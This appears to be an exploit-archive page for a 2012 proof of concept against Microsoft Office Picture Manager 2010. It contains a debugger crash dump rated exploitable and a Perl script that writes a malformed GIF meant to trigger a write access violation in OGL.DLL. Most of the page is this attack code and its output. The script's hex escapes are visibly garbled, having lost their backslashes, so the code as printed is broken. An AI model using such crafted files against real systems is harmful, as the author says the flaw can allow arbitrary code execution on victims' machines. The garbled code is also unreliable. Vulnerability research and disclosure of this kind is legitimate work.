[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Microsoft Office Picture Manager 2010 Crash PoC
# Published : 2012-10-25
# Author :
# Previous Title : WaveSurfer 1.8.8p4 <= Memory Corruption PoC
# Next Title : Oracle Outside-In FPX File Parsing Heap Overflow
Title : Microsoft Office Picture Manager 2010 memory corruption
Version : Microsoft Office professional Plus 2010
Crash : http://img715.imageshack.us/img715/7364/pocl.png
Date : 2012-10-24
Vendor : http://office.microsoft.com
Impact : Med/High
Contact : coolkaveh [at] rocketmail.com
Twitter : @coolkaveh
tested : XP SP3 ENG
###############################################################################
Bug :
----
notice : for testing POC please run the Microsoft Office Picture Manager under a
Debugger and then open the POC file.
----
Successful exploits can allow attackers to execute arbitrary code
----
################################################################################
(554.7a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0620104a
ebx=04f1417f
ecx=0000004f
edx=0000004f
esi=06108348
edi=00000153
eip=4406b8e1
esp=0012e4c4
ebp=0012e4f0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
*** ERROR: Symbol file could not be found.
Defaulted to export symbols for C:Program FilesCommon FilesMicrosoft SharedOFFICE14OGL.DLL -
OGL!GdipSetPenCustomEndCap+0xb00:
4406b8e1 8818 mov byte ptr [eax],bl ds:0023:0620104a=??
0:000>!exploitable -v
eax=0620104a
ebx=04f1417f
ecx=0000004f
edx=0000004f
esi=06108348
edi=00000153
eip=4406b8e1
esp=0012e4c4
ebp=0012e4f0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
OGL!GdipSetPenCustomEndCap+0xb00:
4406b8e1 8818 mov byte ptr [eax],bl ds:0023:0620104a=??
HostMachineHostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x620104a
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation
Exception Hash (Major/Minor): 0x2709141e.0x286f1728
Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at OGL!GdipSetPenCustomEndCap+0x0000000000000b00 (Hash=0x2709141e.0x286f1728)
User mode write access violations that are not near NULL are exploitable.
##############################################################################################################
POC can be download from
http://imageshack.us/scaled/landing/835/poc2.gif
OR try
##############################################################################################################
#!/usr/bin/perl
my $poc =
"x47x49x46x38x39x61x93x00x33x00xE6x7Fx00x23xCCxF5x03xC7xB6xF7x96x25xFCxC7x26".
"xFDx69x2DxA4xD8x7Bx0CxA4xFBx6AxD5x9DxFCxCBxA7x1FxC5xF6xF0x7Ax51x65xCExFAxD9".
"xF0xC7xB3xE3x91xFDx86x4AxF9x77x16xF6xAFx4AxFEx57x06x93xCDx64x03x92xFEx14xB3".
"xF9x8DxCAx5BxFExD4xBExFExE6xA1xF8xBCx6AxC3xE8xFExF5x5Bx34xFDxE1x84xFExE5xD7".
"xF6x86x1Fx00xA7x99xF9xBCx36xF8xC8x8Dx15x98xFFx85xC5x51xFAxCCx74x44xD4xF5xAE".
"xDDxFFxFDxD7x5BxFDxB1x85xFFx91x68xACxDDx85xA7xE4x79x10xABxFAx15xB9xC8x37xA8".
"xFFxDFxF1xFFx00xB2xA4x00xBAxABxFCx62x0AxCAxEFxADx2CxA3xFFx57xB8xFFx00xBExB0".
"xF3xFBxFFx01xADxA0xE7xF5xDAx48xB3xFFxE4xF9xFEx95xD4xFFx1AxC2xD7xFAxF5xD5x09".
"x9ExFCx02x8ExFFx0Ax92xFFxD3xF1xBBxFExF9xF4xFFx5Ex1AxFFxF6xF0x99xD1x6CxEFx56".
"x39x19xBBxF8xD5xF1xFEx9FxD4x73x94xD2x62xCDxE8xB8x64xBExFFxECx4Cx3DxC8xF0xFD".
"x06x99xFDxFBxB5x27x87xC7x54x20x9DxFFx1BxC0xF7x8AxC8x57x9ExDBx6ExEFxFAxE6x16".
"xB7xF8xFFx50x03x01xB6xA9xFAx6Dx10x8Cx8Cx8CxD9xD9xD9xB2xB2xB2x70x70x70x79x79".
"x79xF5xF5xF5xE2xE2xE2xECxECxECxA0xA0xA0xC5xC5xC5xA9xA9xA9xCFxCFxCFxBCxBCxBC".
"x96x96x96x83x83x83x90xCFx5Ex97xD5x66x74xDDxFAx19xBBxB6xFDxF4xE5x13xBCxA2xD2".
"xF2xE0xF7xFBxF4xFAxFDxF8x89xCCx68xFCxCFx41xC1xE9xA1x6CxD3xC8x7DxCDx79x0DxBC".
"xAAxFExEExC3x92xDDx97x97xE6xF8xA7xE4xFDx3FxBDx86x66x66x66xFFxFFxFFx21xFFx0B".
"x58x4Dx50x20x44x61x74x61x58x4Dx50x3Cx3Fx78x70x61x63x6Bx65x74x20x62x65x67x69".
"x6Ex3Dx22xEFxBBxBFx22x20x69x64x3Dx22x57x35x4Dx30x4Dx70x43x65x68x69x48x7Ax72".
"x65x53x7Ax4Ex54x63x7Ax6Bx63x39x64x22x3Fx3Ex20x3Cx78x3Ax78x6Dx70x6Dx65x74x61".
"x20x78x6Dx6Cx6Ex73x3Ax78x3Dx22x61x64x6Fx62x65x3Ax6Ex73x3Ax6Dx65x74x61x2Fx22".
"x20x78x3Ax78x6Dx70x74x6Bx3Dx22x41x64x6Fx62x65x20x58x4Dx50x20x43x6Fx72x65x20".
"x35x2Ex30x2Dx63x30x36x30x20x36x31x2Ex31x33x34x37x37x37x2Cx20x32x30x31x30x2F".
"x30x32x2Fx31x32x2Dx31x37x3Ax33x32x3Ax30x30x20x20x20x20x20x20x20x20x22x3Ex20".
"x3Cx72x64x66x3Ax52x44x46x20x78x6Dx6Cx6Ex73x3Ax72x64x66x3Dx22x68x74x74x70x3A".
"x2Fx2Fx77x77x77x2Ex77x33x2Ex6Fx72x67x2Fx31x39x39x39x2Fx30x32x2Fx32x32x2Dx72".
"x64x66x2Dx73x79x6Ex74x61x78x2Dx6Ex73x23x22x3Ex20x3Cx72x64x66x3Ax44x65x73x63".
"x72x69x70x74x69x6Fx6Ex20x72x64x66x3Ax61x62x6Fx75x74x3Dx22x22x20x78x6Dx6Cx6E".
"x73x3Ax78x6Dx70x4Dx4Dx3Dx22x68x74x74x70x3Ax2Fx2Fx6Ex73x2Ex61x64x6Fx62x65x2E".
"x63x6Fx6Dx2Fx78x61x70x2Fx31x2Ex30x2Fx6Dx6Dx2Fx22x20x78x6Dx6Cx6Ex73x3Ax73x74".
"x52x65x66x3Dx22x68x74x74x70x3Ax2Fx2Fx6Ex73x2Ex61x64x6Fx62x65x2Ex63x6Fx6Dx2F".
"x78x61x70x2Fx31x2Ex30x2Fx73x54x79x70x65x2Fx52x65x73x6FxC2x72x63x65x52x65x66".
"x23x22x20x78x6Dx6Cx6Ex73x3Ax78x6Dx70x3Dx22x68x74x74x70x3Ax2Fx2Fx6Ex73x2Ex61".
"x64x6Fx62x65x2Ex63x6Fx6Dx2Fx78x61x70x2Fx31x2Ex30x2Fx22x20x78x6Dx70x4Dx4Dx3A".
"x4Fx72x69x67x69x6Ex61x6Cx44x6Fx63x75x6Dx65x6Ex74x49x44x3Dx22x78x6Dx70x2Ex64".
"x69x64x3Ax38x41x39x46x30x45x41x35x41x30x30x44x45x32x31x31x41x32x34x43x41x43".
"x31x35x35x33x34x41x36x34x31x31x22x20x78x6Dx70x4Dx4Dx3Ax44x6Fx63x75x6Dx65x6E".
"x74x49x44x3Dx22x78x6Dx70x2Ex64x69x64x3Ax45x32x45x42x41x43x38x44x31x34x39x46".
"x31x31x45x32x41x41x36x44x42x45x41x35x41x39x43x45x43x42x45x34x22x20x78x6Dx70".
"x4Dx4Dx3Ax49x6Ex73x74x61x6Ex63x65x49x44x3Dx22x78x6Dx70x2Ex69x69x64x3Ax45x32".
"x45x42x41x43x38x43x31x34x39x46x31x31x45x32x41x41x36x44x42x45x41x35x41x39x43".
"x45x43x42x45x34x22x20x78x6Dx70x3Ax43x72x65x61x74x6Fx72x54x6Fx6Fx6Cx3Dx22x41".
"x64x6Fx62x65x20x50x68x6Fx74x6Fx73x68x6Fx70x20x43x53x35x20x57x69x6Ex64x6Fx77".
"x73x22x3Ex20x3Cx78x6Dx70x4Dx4Dx3Ax44x65x72x69x76x65x64x46x72x6Fx6Dx20x73x74".
"x52x65x66x3Ax69x6Ex73x74x61x6Ex63x65x49x44x3Dx22x78x6Dx70x2Ex69x69x64x3Ax42".
"x41x32x30x37x42x38x35x39x45x31x34x45x32x31x31x41x30x39x34x41x44x42x30x30x35".
"x30x30x41x38x35x30x22x20x73x74x52x65x66x3Ax64x6Fx63x75x6Dx65x6Ex74x49x44x3D".
"x22x78x6Dx70x2Ex64x69x64x3Ax38x41x39x46x30x45x41x35x41x30x30x44x45x32x31x31".
"x41x32x34x43x41x43x31x35x35x33x34x41x36x34x31x31x22x2Fx3Ex20x3Cx2Fx72x64x66".
"x3Ax44x65x73x63x72x69x70x74x69x6Fx6Ex3Ex20x3Cx2Fx72x64x66x3Ax52x44x46x3Ex20".
"x3Cx2Fx78x3Ax78x6Dx70x6Dx65x74x61x3Ex20x3Cx3Fx78x70x61x63x6Bx65x74x20x65x6E".
"x64x3Dx22x72x22x3Fx3Ex01xFFxFExFDxFCxFBxFAxF9xF8xF7xF6xF5xF4xF3xF2xF1xF0xEF".
"xEExEDxECxEBxEAxE9xE8xE7xE6xE5xE4xE3xE2xE1xE0xDFxDExDDxDCxDBxDAxD9xD8xD7xD6".
"xD5xD4xD3xD2xD1xD0xCFxCExCDxCCxCBxCAxC9xC8xC7xC6xC5xC4xC3xC2xC1xC0xBFxBExBD".
"xBCxBBxBAxB9xB8xB7xB6xB5xB4xB3xB2xB1xB0xAFxAExADxACxABxAAxA9xA8xA7xA6xA5xA4".
"xA3xA2xA1xA0x9Fx9Ex9Dx9Cx9Bx9Ax99x98x97x96x95x94x93x92x91x90x8Fx8Ex8Dx8Cx8B".
"x8Ax89x88x87x86x85x84x83x82x81x80x7Fx7Ex7Dx7Cx7Bx7Ax79x78x77x76x75x74x73x72".
"x71x70x6Fx6Ex6Dx6Cx6Bx6Ax69x68x67x66x65x64x63x62x61x60x5Fx5Ex5Dx5Cx5Bx5Ax59".
"x58x57x56x55x54x53x52x51x50x4Fx4Ex4Dx4Cx4Bx4Ax49x48x47x46x45x44x43x42x41x40".
"x3Fx3Ex3Dx3Cx3Bx3Ax39x38x37x36x35x34x33x32x31x30x2Fx2Ex2Dx2Cx2Bx2Ax29x28x27".
"x26x25x24x23x22x21x20x1Fx1Ex1Dx1Cx1Bx1Ax19x18x17x16x15x14x13x12x11x10x0Fx0E".
"x0Dx0Cx0Bx0Ax09x08x07x06x05x04x03x02x01x00x00x21xF9x04x01x00x00x7Fx00x2Cx00".
"x00x00x00x93x00x33x00x00x07xFFx80x7Fx82x83x84x85x86x87x88x89x8Ax8Bx8Cx8Dx8E".
"x8Fx90x91x92x93x94x95x96x97x98x99x9Ax9Bx9Cx9Dx9Ex9FxA0xA1xA2xA3xA4xA5xA6xA7".
"xA8xA9xAAxABxACxADxAExAFxB0xB1xB2xB3xB4xB5xB6xB7xB8xB9xBAxBBxBCxBDxBExBFxC0".
"xC1x8Dx36x19x3BxC6x19x36xC2xCAx86x19x34x39x39x34x34x4Cx0Bx2ExCBxD6x25x33xD9".
"x2DxDBxCFx34xD5xD6xC1x25x21xE3x21x52x52xD9x33x2Dx34xE0xC0x2Ex21x3Fx40xF1xF1".
"xE3xE6x33x25xECxBEx4Cx3FxFBxFCx3Fx13xF3x21x98xE0xE3xE5x62x82xC1x83x13xFAxFD".
"x9Bx31x70xD7x8Ex27x10x23x4Ex78x62xB0x5Fx43x5Dx39x7Cx68xDCxE8x23x22xC5x7Dx17".
"x5Dx09xB1x60x81xC8x21x87x28x53x1AxF0xB1xB2x23xC5x09x21x5Bx21x40xA1xC0x01x87".
"x42x48x56xE8xDCxB9x42xA5x46x88x31x59xA1x20x40x60xC8x90x9Bx83x32x50x58xB1x74".
"x29xCFx94x3Ex72x04x5Dx85x62x48x04x2Cx58x8Ex26xBDxC2xF5x0Ax85xAFx5Fx9Fx0Ax9C".
"x9AxEAx04x56xACx11x1Cx0Cx72x72xA4xADx5BxAEx60xFFx77xF2x21x9BxCAx02xDAx08x31".
"x62x20x10xE4x64x8AxDFxBFx53xDAxC2x5Dx9Ax8Cx2Ex2Ax02x78xF3x6AxD1x62xD2x49x82".
"xC7x90x13xF8x15x4Cx61x81xE1xB2x8Ax17x3Fx38xF1x07x09x80xCFxA0x01x40x0Ex7Cx64".
"xAEx2Ax33x63xBExF8x59xFDx05xCDx19x30x86xC8xA0x51xCDxDAx35x6Cx45x61xCAx6CxA1".
"xCDx7AxCBx98x33x61x18x89x39x83x26xCDxEAxDEx5Dx82x17x22xF2x40xF3x83x07x1Dx04".
"x7Dx66xC1x82x47xE8xC7x53x12x14x3ExC5x85xF7xF1xE3x5ExBAx0Cx32xE3xFDxBBx9FxF0".
"x88xBAx9Bx5FxBFxDAxCBx18xE5x85xC4x8Cx61x6FxFEx8Bx99x42x27x9Ex43xEFxD0x61x2F".
"x09x16x1Ex04x78x83x75xA0x25xC0xC6x29x5Bx24x48x9Fx79x69x80x51xC6x82xDFx35x58".
"x08x19xEBx25xB8x1Bx7BxE2x0Dx62xA1x17x10x9Ax37x46x21x0ExF0xC7x9Fx00x10xFCxB1".
"xC0x0Dx01x7Ax80x62x16xA1xE9x70x8Ax79xE1xC1x17x46x17x1CxB2x06x1Ex70x83xE4x56".
"xA3x1Fx68x10x02x46x8DxE1x89x61x88x18x66x94x41x5Bx86x82xACx87x06xFFx19x42xE6".
"x48xC6x16xDFx21xF9x47x1Ex23x76x60x44x07x3DxECxA1xE2x0Dx5CxBEx70xC3x0BxD6x1D".
"xF8xE2x71x12x1Ax02x86x71xDFxA1x71x5Bx7Cx68xFAxC1xC5x78xC7xBDxB9x48x18x63x48".
"xF9x9Dx17x72xA6xB7x63x93x82x20x20x80x00x46x34xD1x04x08x4Ex74xF9xC2xA1x88xF2".
"xE0xE2x98x7Ex7CxB1xA6x99xBCx39x9Ax88x18x35x7Ex28x48x17xC7x51xF2x1Dx7Cx89x70".
"x71xDCx19x85x60x20x80xA0x4Dx28xF0x47x1Bx2Fx64xA1x2Ax0CxAAx66xD1x47x10xA8x7C".
"xBAxC8x19xC7x91xB1xC8x83xE7xC1xB9x5Ax19x8Fx3Ax72x9CxA5x8Cx40xE9xC7x16x85x08".
"x01x81xA0x46x18xC1x81x1Dx59xC0x00x43x0DxCFxC2xF0xC6x1Cx54x2CxC1x68x9ExE9xC5".
"xB9x88xA7xABx0DxF2xE3x77xBEx75xD1x85x19x5Cx70xC1xE7x21xC7x49xA9x08xA6xC3x1A".
"xE2x46xB2xC9x9Ex00x07x1Ex35xD4x1Bx40xBDx77x48x50x81x08x0Cx98xA2xADx22xDCxFA".
"xC1x48xC0x84x50xD8x61xA3x63xD8x5Ax48xBAx8ExB0x4BxACx21x50x68x20xB1x00x3Dx1C".
"x50x43xFFx00x18x07x70x40x11xFAx8Ax50x01x0ExA5xFCxDBx69xA6xDBx92x3Cx88x7Cx3B".
"x42xF8x05xA7x0Cx37xE2xF0x21x03x40x41x94x00x17x04x71x40xC6x07x24xC1xF1xBEx22".
"x14x10xF2x6AxD8x1Ex42x70xC9xDDx1Ex22x06x17xE2x76x61xE1x7Ax5ExF0xD9x32x23x2F".
"x1Bx62xC2x00x03x08x00x05x1Dx38xD4xD1x80x1Ex29xA4xA0xB3x04x54x88x10x45x05xFD".
"x8Ex22x72xB6x45x03x6CxB2x23x62x3CxF9xF4xD3x8Bx44x5DxC8x06x54xD7xDDx83xD6x0D".
"xA4x50x80xCEx6Ax84x1Dx85x1Ax3Ex9Bx0Dx34xD1x02x13x4Ex09x6Dx0FxFFx01xF7xBAxAB".
"x25x4Ex48x1Ex75x53x7Dx01x03x79xEBx9Dx84xBEx51x88x40x85x1Ax55x58x21xB8x9Bx86".
"x87xFEx47xAFx8Bx08x9BxF8xE2x89xC8x5Dx08x1Dx03x7CxD0xFAx08x72xE4xBDxF7xCEx22".
"x68xAEx44x15x65x87x72xB6xD0x6BxA3x5DxF8x1Fx4AxDFxC7x48x18xC7x95x31x08xEAx88".
"xA8xFExF8x07xCCx7Fx30xC2x1Fx38x58x5Ex44x05x7ExABxB1x86x0AxB0x8AxB2xBBx21x43".
"xABx9Dx36xBBx5Fx94x61x06x97xE9x7Fx88x41xA3xC8xC8x1FxA2x3Cx21x23x7Cx00x01x04".
"xCFxFFxC1xC0xD7x3Cx6Fx5Ex85x0AxB9x83xB2x7Dx21xDDx8FxFCx3DxD3x16x4Ax50xCAxFC".
"x60xBCxE3xADx46x5DxA9x6Bx5Cx22x84x80x81xF7x81x60x10x4Bx90x80x1Ax32x37xB6xEB".
"xA9xC0x73xDAx1Bx9CxF7x7ExE7xBFxDFxA1xECx60xEDx01x15x21xD2x67x88xF5x15xC2x02".
"x08x10x02x21x18x50x84xDAxD9x4Fx05x32x20x85x85x38x75x88x30x58x68x78x37x2Cx44".
"x91xB6x30xC0xD5xA4x21x61xA4xB3x90xC2x18xF1xA4x2Dx14x30x12x71x58x42x12x2AxB0".
"x86x06x64xEFx32x50x7Cx44x20x00x00x3B".
open(C, ">:raw", "poc.gif");
print C $poc;
close(C);